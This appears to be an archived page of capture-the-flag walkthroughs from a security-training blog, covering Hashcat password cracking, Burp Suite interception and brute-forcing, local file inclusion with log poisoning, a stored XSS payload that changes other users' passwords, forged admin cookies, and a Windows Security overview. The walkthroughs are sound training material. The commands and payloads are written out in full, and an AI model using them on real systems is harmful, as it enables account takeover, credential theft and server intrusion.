-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label TryHackMe. Show all posts
Showing posts with label TryHackMe. Show all posts
  • Crack password with Hashcat

     


     

     

    Hashcat is a password cracker used to crack password hashes. A hash is a one-way function that takes a word or string of words and turns them into a fixed length of random characters. This is a much more secure method of storing passwords rather than storing them in plain text. It is not reversible.


    Hashcat attempts to crack these passwords by guessing a password, hashing it, and then comparing the resulting hash to the one it’s trying to crack.


    Hash Analyzer Tunnelsup.com Hash Analyser allows you to stick a hash into there site and will give you there best guess at what the hash is. This was all i used for the Crack the hash challenge and was pretty much spot on until some of the later tasks.


    Hash-Identifier can be found pre-installed in Kali Linux and will tell you the possible hashing algorithm for the hash you enter. The Nice thing about this other then it already being installed in kali is that it gives you a few alternatives which can help finding finding the right mode in hashcat.


    HashID This is a python based hash identifying tool which needs to be downloaded from there GitHub Repo. The cool thing about this tool is not only does it identify the hashes but also can give you the corresponding hashcat mode as part of the output.


     


     



    hashcat -h | grep sha256
    hashcat -h | grep md5
    hashcat -h | grep salt
    hashcat -h | grep sha
    hashcat --help

     


    In this lab, we will create a set of hashes and then use a dictionary to crack these hashes. The first step is to create the hashes. Open a terminal and use the following command to create a new txt document filled with some hashes: 

     


    echo "dc647eb65e6711e155375218212b3964
    eb61eead90e3b899c6bcbe27ac581660
    958152288f2d2303ae045cffc43a02cd
    2c9341ca4cf3d87b9e4eb905d6a3ec45
    75b71aa6842e450f12aca00fdf54c51d
    031cbcccd3ba6bd4d1556330995b8d08
    b5af0b804ff7238bce48adef1e0c213f" > target-hashes.txt
    


     


     

    These hashes comprise 7 different password which we will attempt to crack.

     

    The next step is to choose the wordlist we will use for cracking the hashes. We will be using the “rockyou.txt” file. Type the following to locate the file:

    locate rockyou.txt

     

    Navigate back to the home directory by typing cd. We are now ready to begin the attack.

    We will use the following command to crack the password hashes:



    hashcat -m 0 -a 0 -o cracked.txt target-hashes.txt /home/hackerboy/Dcouments/rockyou.txt


    Let’s break down each of these options.


    # The -m 0 option tells hashcat that we are attempting to crack MD5 hash types
    # The -a 0 option tells hashcat we are using a dictionary attack
    # The -o cracked.txt option is creating the output file for the cracked passwords
    # The target_hashes.txt is the file containing the hashes
    # The /home/hackerboy/Dcouments/rockyou.txt is the wordlist we will use for this dictionary attack

     

     




     

    If you want to more cracking hashes, follow below the article on TryHackMe Cracking Hashes.

     

    Click Here 

     

     

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



     

     

  • How to use Burp Suite to intercept client-side requests

     

    How to use Burp Suite to intercept client-side requests

     

     

    Intercept client-side requests 


    Burp Suite, a framework of web application pentesting tools, is widely regarded as the de facto tool to use when performing web app testing. Throughout this room, we'll take a look at the basics of installing and using this tool as well as it's various major components. Reference links to the associated documentation per section have been provided at the bottom of most tasks throughout this room. full tutorial of burp suite

     

    we will learn how to use Burp to intercept browser network traffic.

    Once the web browser opens, navigate to the following site:

    http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F

     

    Once there, go back to Burp and turn ON intercept mode. Then, enter any username and password combination into the site and click “Login”. As you will see, the page will remain in a loading state. This is because Burp has now intercepted the request we sent to the server, and is holding it for us to manipulate.


     

    How to use Burp Suite to intercept client-side requests

     

    Now, we will start FoxyProxy in our browser.



    How to use Burp Suite to intercept client-side requests


    Go back to Burp and you will find the intercepted request, along with the username and password data that we entered. To navigate through the different requests Burp is intercepting, simply press the “Forward” button to send the request to the server and view the next request.

     

    How to use Burp Suite to intercept client-side requests


    How to use Burp Suite to intercept client-side requests


     You can also alter any text portion of web traffic when Burb interception mode is ON. Try to change “tfUName=admin” and “tfUPass=none” and press the “Forward” button. Those are valid credentials for the green-colored page, and you will be granted access to the next page.

     

     

    How to use Burp Suite to intercept client-side requests


    How to use Burp Suite to intercept client-side requests

     

     

    Full Tutorial of Burp Suite

     




    Brought to you by Hacking Truth


     

      to you by Hacking Truth

     

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


     

     

  • TryHackMe Web Exploitation Patch Management Is Hard

     

     

    TryHackMe Web Exploitation Patch Management Is Hard

     

     

    Get started with Cyber Security in 25 days, by learning the basics and completing a new, beginner friendly security exercise every day leading up until Christmas; an advent calendar but with security challenges and not chocolate.


    Hey Guys! Sorry for the delay but, we are back with Day 6 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the Day 5 challenge click here.


    This challenge is again based on Web Exploitation and the task is named


    Patch Management is Hard


    DAY 6

    Story


    During a routine security audit before the Incident, McSkidy discovered some recovery passwords on an old server. She created a ticket to decommission this server to reduce this security vulnerability. The Elf assigned to fix this vulnerability kept pushing off the task, and this never got done. Luckily, some of those recovery keys can be used to save some systems.

    Unfortunately, the only way to access the server is through an old web application. See if you can pull out those recovery keys to help McSkidy with her pursuit to save Christmas.



    Learning Objectives of the day


    1.     What is LFI?
    2.     How to perform LFI?
    3.     How to elevate from LFI to RCE?


    Let us understand the concepts targeted for today first!




    What is LFI?


    An LFI vulnerability is found in various web applications. As an example, in the PHP, the following functions cause this kind of vulnerability:


    1.     include
    2.     require
    3.     include_once
    4.     require_once


        
        

    It is a web application vulnerability that allows the attacker to include and read local files on the server. These files could contain sensitive data such as cryptographic keys, databases that contain passwords, and other private data. An LFI vulnerability happens due to a developer’s lack of security awareness. In some cases, developers need to include the content of other local files within a specific page. Suppose a developer includes files without proper input validation. In that case, the LFI vulnerability will exist as a developer should never trust user input and keep all inputs from users to be filtered and sanitized. The main issue of these vulnerabilities is the lack of input validation, in which the user inputs are not sanitized or validated, and the user controls them.


    You should read the content given with the challenge for the best understanding of LFI



    Q1.Deploy the attached VM and look around. What is the entry point for our web application?

     


    TryHackMe Web Exploitation Patch Management Is Hard



    Ans :- err


    Q2.Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

    We first go to our entry point and replace the error.txt file with ‘/etc/passwd’ file just to check if we can get it!


    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false 
    
    
    




    Yes we have access, but normally we shouldn’t have that!


    TryHackMe Web Exploitation Patch Management Is Hard



    Now we check for /etc/flag and voila!



    Ans :- THM{d29e08941cf7fe41df55f1a7da6c4c06}



    Q3.Use the PHP filter technique to read the source code of the index.php. What is the $flag variable’s value?

    We use the PHP filter technique to read the code for index.php by using :

    php://filter/convert.base64-encode/resource=

    https://10-10-247-133.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=index.php
    



    TryHackMe Web Exploitation Patch Management Is Hard



    Once we find the base64 encoding for it, we go to https://www.base64decode.org/ and decode it for our answer!

    Or

    You can use the base64 command in terminal...


    echo "aplhanumeric character" | base64 -d


    echo "PD9waHAgc2Vzc2lvbl9zdGFydCgpOwokZmxhZyA9ICJUSE17NzkxZDQzZDQ2MDE4YTBkODkzNjFkYmY2MGQ1ZDllYjh9IjsKaW5jbHVkZSgiLi9pbmNsdWRlcy9jcmVkcy5waHAiKTsKaWYoJF9TRVNTSU9OWyd1c2VybmFtZSddID09PSAkVVNFUil7ICAgICAgICAgICAgICAgICAgICAgICAgCgloZWFkZXIoICdMb2NhdGlvbjogbWFuYWdlLnBocCcgKTsKCWRpZSgpOwp9IGVsc2UgewoJJGxhYk51bSA9ICIiOwogIHJlcXVpcmUgIi4vaW5jbHVkZXMvaGVhZGVyLnBocCI7Cj8+CjxkaXYgY2xhc3M9InJvdyI+CiAgPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4KICA8L2Rpdj4KICA8ZGl2IGNsYXNzPSJjb2wtbGctOCBjb2wtb2Zmc2V0LTEiPgogICAgICA8P3BocCBpZiAoaXNzZXQoJGVycm9yKSkgeyA/PgogICAgICAgICAgPHNwYW4gY2xhc3M9InRleHQgdGV4dC1kYW5nZXIiPjxiPjw/cGhwIGVjaG8gJGVycm9yOyA/PjwvYj48L3NwYW4+CiAgICAgIDw/cGhwIH0KCj8+CiA8cD5XZWxjb21lIDw/cGhwIGVjaG8gZ2V0VXNlck5hbWUoKTsgPz48L3A+Cgk8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1kYW5nZXIiIHJvbGU9ImFsZXJ0Ij5UaGlzIHNlcnZlciBoYXMgc2Vuc2l0aXZlIGluZm9ybWF0aW9uLiBOb3RlIEFsbCBhY3Rpb25zIHRvIHRoaXMgc2VydmVyIGFyZSBsb2dnZWQgaW4hPC9kaXY+IAoJPC9kaXY+Cjw/cGhwIGlmKCRlcnJJbmNsdWRlKXsgaW5jbHVkZSgkX0dFVFsnZXJyJ10pO30gPz4KPC9kaXY+Cgo8P3BocAp9Cj8+</div>" | base64 -d
    



    TryHackMe Web Exploitation Patch Management Is Hard


    Answer :-  THM{791d43d46018a0d89361dbf60d5d9eb8}


    Q4.McSkidy forgot his login credential. Can you help him to login in order to recover one of the server’s passwords?


    Now that you read the index.php, there is a login credential PHP file’s path. Use the PHP filter technique to read its content. What are the username and password?


    Using the same base64 encoding of index.php file, we also see that there is ./includes/creds.php which has the credentials.



    https://10-10-231-193.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
    
    


    TryHackMe Web Exploitation Patch Management Is Hard


    We do the same process and use the PHP filter process to go to this file and then decode it and get the credentials!



    TryHackMe Web Exploitation Patch Management Is Hard



    Answer:- McSkidy:A0C315Aw3s0m




    Q5.Use the credentials to login into the web application. Help McSkidy to recover the server’s password. What is the password of the flag.thm.aoc server?

    We have the username and password, we login and we see a fe options!


    TryHackMe Web Exploitation Patch Management Is Hard



    We know we have to recover the password, so we go on password recovery



    TryHackMe Web Exploitation Patch Management Is Hard


    Answer:- THM{552f313b52e3c3dbf5257d8c6db7f6f1}


    Q6.The web application logs all users’ requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

    We send in a CURL command in order to test the logs and see how it shows.


    curl -A "TESTIN TESTING" http://10-10-88-123.p.thmlabs.com/login.php

    the “-A” option helps us set the User Agent and we see TESTIN TESTING as user agent


    Now, we do the same, instead with a little php payload to display the phpinfo!



    TryHackMe Web Exploitation Patch Management Is Hard


    Now to check the log file we need to go to “./includes/logs/app_access.log”, but, for that, we need to go to another window where we a re not logged in to actually check it!


    And we see the PHP info file in the logs!!!!!

    We can see the hostname directly in the phpinfo in the System column

    Answer:- lfi-aoc-awesome-59aedca683fff9261263bb084880c965


    The question does ask for RCE, but the this task can be completed without RCE!



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     


  • TryHackMe Web Exploitation Pesky Elf Forum XSS

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     

     

    We are back with Day 5 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the Previous Day challenge click here.

    This challenge is again based on Web Exploitation and the task is named Pesky Elf Forum. TryHackMe Web Exploitation Pesky Elf Forum XSS



    Learning Objectives:


    • What is an XSS vulnerability?
    • What Types of XSS vulnerabilities are there?
    • Challenge Walkthrough.




    What is an XSS vulnerability?


    Cross-Site Scripting, better known as XSS in the cybersecurity community, is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users.


    If you can get JavaScript to run on a victim’s computer, there are numerous things you can achieve. This can range from stealing the victim’s cookies to take over their session, running a keylogger that will log every key the user presses on their keyboard while visiting the website, redirecting the user to a totally different website altogether or performing some kind of action on the website such as placing an order, or resetting their password etc.



    What types of XSS vulnerabilities are there?



    1. DOM
    2. Reflected
    3. Stored
    4. Blind





    Let’s Get Started..

    1. What flag did you get when you disabled the plugin?

     

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     

     

    Login using Username: McSkidy Password: password

    Leave a comment on any post as Follow <a href="https://www.kumaratuljaiswal.in">kumaratuljaiswal.in</a>


     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     

     



    Once your comment is posted, you’ll see that the word ‘kumaratuljaiswal.in’ has been underlined.

     

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS



    This means the comment is reflected as you wrote it without the underline HTML tags being stripped out. As this isn’t being stripped out, you can try the HTML script tags instead to see if the website will run any JavaScript that is entered.



    Using the URL, you found earlier for changing the user’s password, you can try the following payload:


    <script>fetch('/settings?new_password=pass123');</script>

     

     

    The <script> tag tells the browser we want to run some JavaScript, and the fetch command makes a network request to the specified URL.

    After posting the above as a comment, you could view the webpage source to see whether it has been shown correctly. The screenshot below shows us that the script tags aren’t being stripped out or disabled and, in fact, are working:


     


    TryHackMe Web Exploitation Pesky Elf Forum XSS


     

     


    Now that we have this XSS running on the forum, it means that any logged in users viewing the thread will automatically have their password changed to pass123. So let’s log out and see if the Grinch has visited the thread by trying to log in as them (It may take up to a minute before the Grinch visits the page and their password changes).



    Username: grinch

    Password: pass123



    Once logged in, go to the settings page again, and this time, you’ll discover another feature with the option to disable the Christmas to Buttmas plugin.


     

    TryHackMe Web Exploitation Pesky Elf Forum XSS

     


    Disable the plugin, and you’ll be awarded a flag.

     

     

    TryHackMe Web Exploitation Pesky Elf Forum XSS


     

    Done :-)

     

     

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

  • TryHackMe Web Exploitation Santa's Running Behind

     



     

    Story



    McSysAdmin managed to reset everyone’s access except Santa’s! Santa’s expected some urgent travel itinerary for his route over Christmas. Rumour has it that Santa never followed the password security recommendations. Can you use bruteforcing to help him access his accounts?
    Learning Objectives of the day


    1. Understanding authentication and where it is used
    2. Understanding what fuzzing is
    3. Understanding what Burp Suite is and how we can use it for fuzzing a login form to gain access
    4. Apply this knowledge to retrieve Santa’s travel itinerary




    Let us understand the concepts targeted for today first!


    What is authentication, and where is it Used?

    Authentication is the process of verifying a user’s identity, establishing that they are who they say they are. Authentication can be proven using a variety of authentication means, including:

    • A known set of credentials to the server and user such as a username and password
    • Token authentication (these are unique pieces of encrypted text)
    • Biometric authentication (fingerprints, retina data, etc.)




    Authentication is often used interchangeably with authorisation, but it is very different. Authorisation is a term for the rules defining what an authenticated user can and cannot access.


    What is Fuzzing?



    Put simply, fuzzing is an automated means of testing an element of a web application until the application gives a vulnerability or valuable information. When we are fuzzing, we provide information as we would typically when interacting with it, just at a much faster rate. This means that we can use extensive lists known as wordlists to test a web application’s response to various information.
     

     


    Steps to Fuzz with Burp Suite



    Let’s launch FireFox by navigating to “Applications -> Internet-> Firefox”

    avigate to the login form in the web browser using the vulnerable IP address (http://MACHINE_IP) (note that the IP address in the screenshots is only an example, you will need to replace this with the MACHINE_IP)

     

     


     


    And press “Intercept On” in “Proxy -> Intercept”

    Now we will need to return to our Firefox Browser and enable the FoxyProxy extension in Firefox. You can do this by pressing the “FoxyProxy” extension and pressing “Burp

    Submit some dummy data on the login form


    Let’s launch Burp Suite by navigating to “Applications -> Other -> Burp Suite”

    Navigate to the “Proxy” tab

     

    TryHackMe Web Exploitation Santa's Running Behind

     

     


    We will need to return to Burp Suite, where we will see some data has now been returned to us. Right-click the window containing the data and press “Send to Intruder
        
        

    TryHackMe Web Exploitation Santa's Running Behind


     

     
    Navigate to the “Intruder” tab

    10.1. Click the “Positions” tab and clear the pre-selected positions by pressing “Clear $”

    10.2. Add the value of the “username” parameter as the first position, sometimes we will already know the username, other times we will not. We can tell Burp to use a wordlist of usernames for this position as well. However, as the username is already known (i.e. cmnatic), we are just brute-forcing the password. (this can be done by highlighting the password parameter and clicking “Add $”)

    10.3. Add the “password” value as the position (i.e. password123) (this can be done by highlighting the value in the password parameter and clicking “Add $”)

     

     

    TryHackMe Web Exploitation Santa's Running Behind

     

     
    10.4. Select “Cluster Bomb” in the Attack type in the dropdown menu.

    10.5. We will now need to provide some values for Burp Suite to fuzz the login form with passwords. We can provide a list manually, or we can provide a wordlist. I will be providing a wordlist.

     

     

     TryHackMe Web Exploitation Santa's Running Behind

     


    TryHackMe Web Exploitation Santa's Running Behind


     

     TryHackMe Web Exploitation Santa's Running Behind

     

     



    11. Now after selecting our wordlist, we can see that some passwords have filled the “Payload Options” window

    12. Now let’s press the “Start Attack” button, this will begin fuzzing the login form. Look at the results and sort by “Length”. Unsuccessful passwords will return a certain length, and successful passwords will return another length.



    TryHackMe Web Exploitation Santa's Running Behind


     

    Now that we understand how to use Burp Suite, we can create our own attacks and complete the challenge!

     



    Q1. What valid password can you use to access the “santa” account?

    Follow the steps mentioned above and create your own attack.

    If you read the challenge properly, the link for the wordlist is given there already.

    Use this wordlist for your attack and select the Cluster attack for this challenge.

    Navigate to the vulnerable login form at http://10.10.205.31/ and apply the material for
    today's task to login to Santa's itinerary, using the username as "santa" and the password
    list located at /root/Rooms/AoC3/Day4/passwords.txt on the TryHackMe AttackBox (or download
    it from here for your payload.
    
    
    


    Answer - cookie




    Q2. What is the flag in Santa’s itinerary?

    Once you have logged in from the login panel, you get the flag!!


    TryHackMe Web Exploitation Santa's Running Behind


     

    Answer - THM{SANTA_DELIVERS}


     

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

     

  • TryHackMe Web Exploitation Session Cookies

     

     

    TryHackMe Web Exploitation Session Cookies

     

    Story


    McSkidy needs to check if any other employee elves have left/been affected by Grinch Industries attack, but the systems that hold the employee information have been hacked. Can you hack them back to determine if the other teams in the Best Festival Company have been affected?



    Learning Objectives of Day 2:
     

    • Understanding the underlying technology of web servers and how the web communicates.
    • Understand what cookies are and their purpose.
    • Learn how to manipulate and manage cookies for malicious use.



    Let us understand the concepts targeted for today first!



    HTTP(S)



    he HTTP protocol is a client-server protocol to provide communication between a client and a webserver. HTTP requests are similar to a standard TCP network request; however, HTTP adds specific headers to the request to identify the protocol and other information.

    When an HTTP request is crafted, the method and target header will always be included. The target header will specify what to retrieve from the server, and the method header will specify how.

    When retrieving information from a web server, it is common to use the GET method, such as loading a picture.

    When sending data to a web server, it is common to use the POST method, such as sending login information.





    Example Request

    GET / HTTP/1.1
    Host: tryhackme.com
    User-Agent: Mozilla/5.0 Firefox/87.0
    Referer: https://tryhackme.com/
    
    
    


    Example Response


    HTTP/1.1 200 OK
    Server: nginx/1.15.8
    Date: Wednesday, 24 Nov 2021 13:34:03 GMT
    Content-Type: text/html
    Content-Length: 98
    
    
    



    Cookies


    Cookies are tiny pieces of data (metadata) or information locally stored on your computer that are sent to the server when you make a request.

    Cookies can be assigned any name and any value allowing the webserver to store any information it wants. Today we will be focusing on authentication cookies, also known as session cookies. Authentication or session cookies are used to identify you and what access level is attached to your session.



    Cookie Manipulation


    Cookie manipulation is taking a cookie and modifying it to obtain unintended behavior determined by the web developer. Cookie manipulation is possible because cookies are stored locally on your host system, meaning you have complete control over them and modify them as you please.

    To begin modifying and manipulating cookies, we need to open our developer tools. In Google Chrome, developer tools are known as the “Chrome Developer Tools,” and in Mozilla Firefox, they are known as the “Firefox Developer Tools.”

    Developer tools can be accessed by pressing F12 or Ctrl+Shift+I. Once developer tools are open, to access your cookies, navigate to the Storage tab in Firefox or Application tab in Chrome/Edge; select the Cookies dropdown on the left-hand side of the console.

    Now that we understand these basic terms and concepts! Lets Enumerate!!



    Q1. What is the name of the new cookie that was created for your account?


    Once you open the website from the given link, you have to register an account.




    TryHackMe Web Exploitation Session Cookies

    
    
        Advent of Cyber
    
    
        Welcome To Advent of Cyber!
    
     
     

    Then open the developer options and check for the cookie and find out the cookie name


    TryHackMe Web Exploitation Session Cookies


    Answer: user-auth


    Q2. What encoding type was used for the cookie value?

    If you notice the value of the cookie that was generated,it is alphanumeric with more of numbers and less of alphabets.


    TryHackMe Web Exploitation Session Cookies


    Mostly all these alphabets are between “a” and “f” and we know only kind of encoding that is this way which is


    Answer: Hexadeciaml



    Q3. What object format is the data of the cookie stored in?

    We can see that the value of the cookie is encoded so we need to go and get the value decoded.

    We can do this by going onto CyberChef and inputting our cookie value. We convert it from hex so we get our output



    TryHackMe Web Exploitation Session Cookies


    From the image we can clearly see that the data is stored in key-value pairs and that is why it is called

    Answer: JSON



    Now we need to manipulate the cookie to get Admin access!!

    Now copy the json output and set it as the input for this conversion in CyberChef tool. Select the option of “ To Hex” and set the delimiter as none so as to avoid all the spaces that come with it.



    TryHackMe Web Exploitation Session Cookies


    Once we do that, we have the value of the same json with user as “admin”

    Q4. What is the value of the administrator cookie? (username = admin)


    Ans :-


     7b636f6d70616e793a2022546865204265737420466573746976616c20436f6d70616e79222c206973726567697374657265643a2254727565222c20757365726e616d653a2261646d696e227d
    
    
    
    


    You can also decode this hex value via terminal through this command 

     

     

    echo " 7b636f6d70616e793a2022546865204265737420466573746976616c20436f6d70616e79222c206973726567697374657265643a2254727565222c20757365726e616d653a2261646d696e227d" | xxd -r -p
    

     

     

     

    TryHackMe Web Exploitation Session Cookies

     

     

     

    We have the value of the admin login cookie, so we go back to our page and edit the value of the cookie into this new value for admin login.

    and Voila!!

    We are now Admin!!


    TryHackMe Web Exploitation Session Cookies



    Q5. What team environment is not responding?


    Ans :- HR



    Q6. What team environment has a network warning?


    Ans :- Application



    All answer done :-)




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

  • windows security module

     

    windows security module

     


    Windows Security


    Per Microsoft, "Windows Security is your home to manage the tools that protect your device and your data".

    In case you missed it, Windows Security is also available in Settings.

     

     

    windows security module

     

     

     In the above image, focus your attention on Protection areas.

    • Virus & threat protection
    • Firewall & network protection
    • App & browser control
    • Device security


    Each following task will briefly touch on these areas.


    Before proceeding, let's provide a quick comment on the status icons.


    • Green means your device is sufficiently protected, and there aren't any recommended actions.
    • Yellow means there is a safety recommendation for you to review.
    • Red is a warning that something needs your immediate attention.

        

    Click on Open Windows Security.

     

    windows security module

     

     

    Note: Since the attached VM is a Windows Server 2019 edition, it looks different from a Windows 10 Home or Professional edition.

    The below image is from a Windows 10 device.

     

    windows security module

     

     

    1) In the above image, which area needs immediate attention?

    Ans - Virus and Threat Protection


     

    Virus & threat protection


    Virus & threat protection is divided into two parts:

    • Current threats
    • Virus & threat protection settings



    The image below only focuses on Current threats. 

     

     

    windows security module

     


    Current threats


    Scan options


    • Quick scan - Checks folders in your system where threats are commonly found.
    • Full scan - Checks all files and running programs on your hard disk. This scan could take longer than one hour.
    • Custom scan - Choose which files and locations you want to check.


    Threat history


    • Last scan - Windows Defender Antivirus automatically scans your device for viruses and other threats to help keep it safe.
    • Quarantined threats - Quarantined threats have been isolated and prevented from running on your device. They will be periodically removed.
    • Allowed threats - Allowed threats are items identified as threats, which you allowed to run on your device.


    Warning: Allow an item to run that has been identified as a threat only if you are 100% sure of what you are doing.


    Next is Virus & threat protection settings.

     

    windows security module



    Virus & threat protection settings


    Manage settings


    • Real-time protection - Locates and stops malware from installing or running on your device.
    • Cloud-delivered protection - Provides increased and faster protection with access to the latest protection data in the cloud.
    • Automatic sample submission - Send sample files to Microsoft to help protect you and others from potential threats.
    • Controlled folder access - Protect files, folders, and memory areas on your device from unauthorized changes by unfriendly applications.
    • Notifications - Windows Defender Antivirus will send notifications with critical information about the health and security of your device.



    Warning: Excluded items could contain threats that make your device vulnerable. Only use this option if you are 100% sure of what you are doing.


    Virus & threat protection updates


    Check for updates - Manually check for updates to update Windows Defender Antivirus definitions.  


    Ransomware protection


    Controlled folder access - Ransomware protection requires this feature to be enabled, which in turn requires Real-time protection to be enabled.



    Note: Real-time protection is turned off in the attached VM to decrease the chances of performance issues. Since the VM can't reach the Internet and there aren't any threats in the VM, this is safe to do. Real-time protection should definitely be enabled in your personal Windows devices unless you have a 3rd party product that provides the same protection. Ensure it's always up-to-date and enabled.  

    Tip: You can perform on-demand scans on any file/folder by right-clicking the item and selecting 'Scan with Microsoft Defender'.


    The below image was taken from another Windows device to show this feature.



    1) Specifically, what is turned off that Windows is notifying you to turn on?

    Ans - Real-time protection




    Firewall & network protection


    What is a firewall?

    Per Microsoft, "Traffic flows into and out of devices via what we call ports. A firewall is what controls what is - and more importantly isn't - allowed to pass through those ports. You can think of it like a security guard standing at the door, checking the ID of everything that tries to enter or exit".

    The below image will reflect what you will see when you navigate to Firewall & network protection.



    windows security module



    Note: Each network may have different status icons for you.

    What is the difference between the 3 (Domain, Private, and Public)?

    Per Microsoft, "Windows Firewall offers three firewall profiles: domain, private and public".


    • Domain - The domain profile applies to networks where the host system can authenticate to a domain controller.
    • Private - The private profile is a user-assigned profile and is used to designate private or home networks.
    • Public - The default profile is the public profile, used to designate public networks such as Wi-Fi hotspots at coffee shops, airports, and other locations.



    If you click on any firewall profile, another screen will appear with two options: turn the firewall on/off and block all incoming connections.



    windows security module


    Warning: Unless you are 100% confident in what you are doing, it is recommended that you leave your Windows Defender Firewall enabled.

    Allow an app through firewall



    windows security module


    You can view what the current settings for any firewall profile are. In the above image, several apps have access in the Private and/or Public firewall profile. Some of the apps will provide additional information if it's available via the Details  button. 


    Advance Setting

     


    windows security module


    Configuring the Windows Defender Firewall is for advanced Windows users. Refer to the following Microsoft documentation on best practices here.

    Tip: Command to open the Windows Defender Firewall is WF.msc.


    1) If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?

    Ans - public network



    App & browser control


    In this section, you can change the settings for the Microsoft Defender SmartScreen.

    Per Microsoft, "Microsoft Defender SmartScreen protects against phishing or malware websites and applications, and the downloading of potentially malicious files".

    Refer to the official Microsoft document for more information on Microsoft Defender SmartScreen here.



    windows security module



    Check apps and file

    Windows Defender SmartScreen helps protect your device by checking for unrecognized apps and files from the web.



    windows security module


    Exploit protection


    Exploit protection is built into Windows 10 (and, in our case, Windows Server 2019) to help protect your device against attacks.



    windows security module



    Warning: Unless you are 100% confident in what you are doing, it is recommended that you leave the default settings.



    Device security


    Even though you'll probably never change any of these settings, for completion's sake, it will be covered briefly.



    windows security module


    Core isolation
     

    Memory Integrity - Prevents attacks from inserting malicious code into high-security processes.



    windows security module


    Warning: Unless you are 100% confident in what you are doing, it is recommended that you leave the default settings.

    The below images are from another machine to show another security feature that should be available in a personal Windows 10 device.


    Security processor


    windows security module


    Below are the Security processor details.


    windows security module


    What is the Trusted Platform Module (TPM)?

